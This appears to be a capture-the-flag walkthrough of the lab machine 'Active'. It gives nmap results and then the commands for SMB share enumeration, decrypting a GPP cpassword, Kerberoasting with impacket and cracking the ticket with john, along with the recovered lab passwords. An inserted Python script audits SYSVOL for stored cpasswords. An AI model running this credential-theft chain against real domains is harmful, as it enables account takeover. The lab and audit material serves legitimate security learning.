PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-30 07:58:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3889/tcp filtered dandv-tester
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3m46s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-30T07:59:01
|_ start_date: 2021-12-30T07:55:42
Check for SMB vulnerabilities
nmap -p 139,445 --script=smb-vuln* -Pn 10.10.10.100
Nothing exploitable.
List the SMB shares
smbclient --no-pass -L //10.10.10.100
Keep probing whether any share allows a login; Replication does
smbclient //10.10.10.100/Replication -U ""%""
I originally wanted to use smbmap -H 10.10.10.100 -R to list all the files, but the network was probably too bad and smbmap could not connect.
Had to browse manually, and found this file:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
Obtained a set of credentials
According to the walkthrough: Whenever a new Group Policy Preference (GPP) is created, there's an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it's stored as cpassword. But then Microsoft published the key on MSDN!
Decrypt it with gpp-decrypt (pypykatz also works)
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
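From the defender's side, the fix is to find every GPP file in SYSVOL that still carries a cpassword before someone else does. The following audit script is an added example, not code from the original writeup or from any tool it uses; it walks a copy of SYSVOL, parses the known GPP preference files and reports each element whose cpassword attribute is non-empty. The sample tree it builds is constructed from the Groups.xml shown above plus a clean Services.xml with a placeholder clsid; the GPO GUID in the path is a placeholder, and the account attribute names are those used by the common GPP file types.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account on each file type's Properties element (Groups, Services, Tasks, DataSources).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed samples: the Groups.xml found in the Replication share, and a Services.xml with no stored secret.
SAMPLE_GROUPS_XML = '''<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>'''
SAMPLE_SERVICES_XML = '''<?xml version="1.0" encoding="utf-8"?>
<NTServices clsid="{EXAMPLE-CLSID}"><NTService name="Spooler">
<Properties action="U" serviceName="Spooler" accountName="LocalSystem" cpassword=""/></NTService></NTServices>'''


def find_cpasswords(sysvol_root):
    """Walk a SYSVOL copy; return one finding per element whose cpassword is non-empty."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed XML: skip it rather than abort the whole audit
            for elem in root.iter():
                cpw = elem.attrib.get("cpassword")
                if not cpw:  # attribute absent or empty: nothing stored
                    continue
                account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
                findings.append({"file": os.path.relpath(path, sysvol_root),
                                 "account": account, "cpassword_len": len(cpw)})
    return findings


def demo():
    """Write the constructed samples into a temporary SYSVOL-like tree and audit it."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "Policies", "{EXAMPLE-GPO-GUID}", "MACHINE", "Preferences")
        for sub, fname, body in (("Groups", "Groups.xml", SAMPLE_GROUPS_XML),
                                 ("Services", "Services.xml", SAMPLE_SERVICES_XML)):
            os.makedirs(os.path.join(base, sub), exist_ok=True)
            with open(os.path.join(base, sub, fname), "w", encoding="utf-8") as f:
                f.write(body)
        return find_cpasswords(root)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['file']}: cpassword set for {hit['account']} ({hit['cpassword_len']} chars)")
```

Only the Groups.xml entry for SVC_TGS is reported; the Services.xml with an empty cpassword is correctly ignored. Point find_cpasswords at a mounted or copied SYSVOL to run it against a real domain.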
Try these credentials on the other shares
# If the network is too slow, smbmap cannot connect, but smbclient can
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
smbclient //10.10.10.100/Users -U "SVC_TGS"%"GPPstillStandingStrong2k18"
user.txt is on SVC_TGS's Desktop
P.S. No shell yet at this point, because none of the SMB shares are writable for this user
rpcclient -U "" -N 10.10.10.100
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
ldap:
nmap -n -sV --script "ldap* and not brute" -Pn 10.10.10.100
A long output; it shows the domain name is active.htb, which I add to the hosts file
Next check for a DNS zone transfer vulnerability; there is none
dnsrecon -d active.htb -t axfr
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='active.htb'" 10.10.10.100
Found an Administrator account
Query for services running under user accounts
sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Save the output to a file and crack it with john
john --wordlist=/usr/share/wordlists/rockyou.txt tgt.out
Administrator's password is Ticketmaster1968
With these credentials a shell can be obtained via psexec